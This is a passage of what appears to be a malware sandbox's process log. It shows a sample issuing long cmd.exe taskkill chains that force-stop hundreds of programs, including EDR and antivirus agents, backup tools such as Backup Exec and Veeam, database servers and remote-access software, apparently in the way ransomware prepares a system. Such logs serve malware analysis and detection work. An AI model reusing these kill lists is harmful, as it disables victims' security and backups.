U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
4⤵
PID:2516

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSDS.exe /F
5⤵
PID:5464

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mysqld.exe /F
5⤵
- Kills process with taskkill
PID:5500

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer_Service.exe /F
5⤵
PID:6188

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer.exe /F
5⤵
- Kills process with taskkill
PID:1460

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CasLicenceServer.exe /F
5⤵
PID:2544

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_w32.exe /F
5⤵
PID:5680

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_x64.exe /F
5⤵
PID:7016

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rdm.exe /F
5⤵
PID:5300

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SecureCRT.exe /F
5⤵
PID:6028

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SecureCRTPortable.exe /F
5⤵
PID:3976

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VirtualBox.exe /F
5⤵
- Kills process with taskkill
PID:4372

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VirtualBoxVM.exe /F
5⤵
PID:6720

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSVC.exe /F
5⤵
PID:4808

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM abs_deployer.exe /F
5⤵
PID:5696

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_monitor.exe /F
5⤵
PID:3452

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sfupdatemgr.exe /F
5⤵
PID:5720

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ipc_proxy.exe /F
5⤵
PID:6728

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_agent.exe /F
5⤵
PID:6684

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_sec_plan.exe /F
5⤵
PID:2124

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sfavsvc.exe /F
5⤵
PID:2612

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
5⤵
PID:5936

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DataShareBox.ShareBoxService.exe /F
5⤵
PID:6736

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Jointsky.CloudExchangeService.exe /F
5⤵
PID:3188

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
5⤵
PID:5748

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
4⤵
PID:308

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExec.exe /F
5⤵
PID:3240

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Att.exe /F
5⤵
PID:5372

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mdm.exe /F
5⤵
PID:6268

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExecManagementService.exe /F
5⤵
PID:7148

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM bengine.exe /F
5⤵
PID:6964

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM benetns.exe /F
5⤵
PID:6892

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beserver.exe /F
5⤵
- Kills process with taskkill
PID:1796

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pvlsvr.exe /F
5⤵
PID:4340

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM bedbg.exe /F
5⤵
PID:1488

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
5⤵
PID:5968

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
5⤵
PID:6092

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
5⤵
PID:2160

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
5⤵
PID:6912

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RemoteAssistProcess.exe /F
5⤵
PID:3792

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarMoniService.exe /F
5⤵
PID:3188

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GoodGameSrv.exe /F
5⤵
PID:1728

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarCMService.exe /F
5⤵
PID:5608

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TsService.exe /F
5⤵
- Kills process with taskkill
PID:6620

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GoodGame.exe /F
5⤵
PID:5152

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarServerView.exe /F
5⤵
PID:6460

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM IcafeServicesTray.exe /F
5⤵
PID:6848

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BsAgent_0.exe /F
5⤵
PID:4272

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ControlServer.exe /F
5⤵
PID:5012

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DisklessServer.exe /F
5⤵
PID:4604

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DumpServer.exe /F
5⤵
PID:5380

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM NetDiskServer.exe /F
5⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
4⤵
PID:1168

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pg_ctl.exe /F
5⤵
PID:3496

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rcrelay.exe /F
5⤵
PID:4864

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SogouImeBroker.exe /F
5⤵
PID:6660

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CCenter.exe /F
5⤵
PID:6956

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ScanFrm.exe /F
5⤵
PID:6744

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM d_manage.exe /F
5⤵
PID:4692

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RsTray.exe /F
5⤵
PID:5740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wampmanager.exe /F
5⤵
PID:3496

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RavTray.exe /F
5⤵
PID:6276

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mssearch.exe /F
5⤵
PID:196

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlmangr.exe /F
5⤵
PID:6784

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM msftesql.exe /F
5⤵
PID:4812

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SyncBaseSvr.exe /F
5⤵
PID:5860

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM oracle.exe /F
5⤵
PID:4992

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TNSLSNR.exe /F
5⤵
PID:6288

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SyncBaseConsole.exe /F
5⤵
PID:2300

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM aspnet_state.exe /F
5⤵
PID:4864

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM AutoBackUpEx.exe /F
5⤵
PID:5772

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM redis-server.exe /F
5⤵
PID:4440

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM MySQLNotifier.exe /F
5⤵
PID:7052

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM oravssw.exe /F
5⤵
PID:7028

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fppdis5.exe /F
5⤵
PID:5604

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM His6Service.exe /F
5⤵
PID:4452

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM dinotify.exe /F
5⤵
PID:5696

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM JhTask.exe /F
5⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
4⤵
PID:2324

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ThunderPlatform.exe /F
5⤵
PID:6924

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iexplore.exe /F
5⤵
PID:5692

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent.exe /F
5⤵
PID:6644

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent-daemon.exe /F
5⤵
PID:7064

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM eSightService.exe /F
5⤵
- Kills process with taskkill
PID:5556

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cygrunsrv.exe /F
5⤵
- Kills process with taskkill
PID:6052

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wrapper.exe /F
5⤵
PID:2120

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM nginx.exe /F
5⤵
PID:4520

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM node.exe /F
5⤵
PID:6512

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sshd.exe /F
5⤵
PID:6484

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-tray.exe /F
5⤵
PID:4444

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iempwatchdog.exe /F
5⤵
PID:4108

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlwriter.exe /F
5⤵
PID:6736

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM php.exe /F
5⤵
PID:5588

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "notepad++.exe" /F
5⤵
PID:5388

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "phpStudy.exe" /F
5⤵
PID:6016

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM OPCClient.exe /F
5⤵
- Kills process with taskkill
PID:6600

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM navicat.exe /F
5⤵
PID:5968

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SupportAssistAgent.exe /F
5⤵
PID:4776

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SunloginClient.exe /F
5⤵
PID:4372

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SOUNDMAN.exe /F
5⤵
PID:3680

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WeChat.exe /F
5⤵
- Kills process with taskkill
PID:5460

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TXPlatform.exe /F
5⤵
PID:5140

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 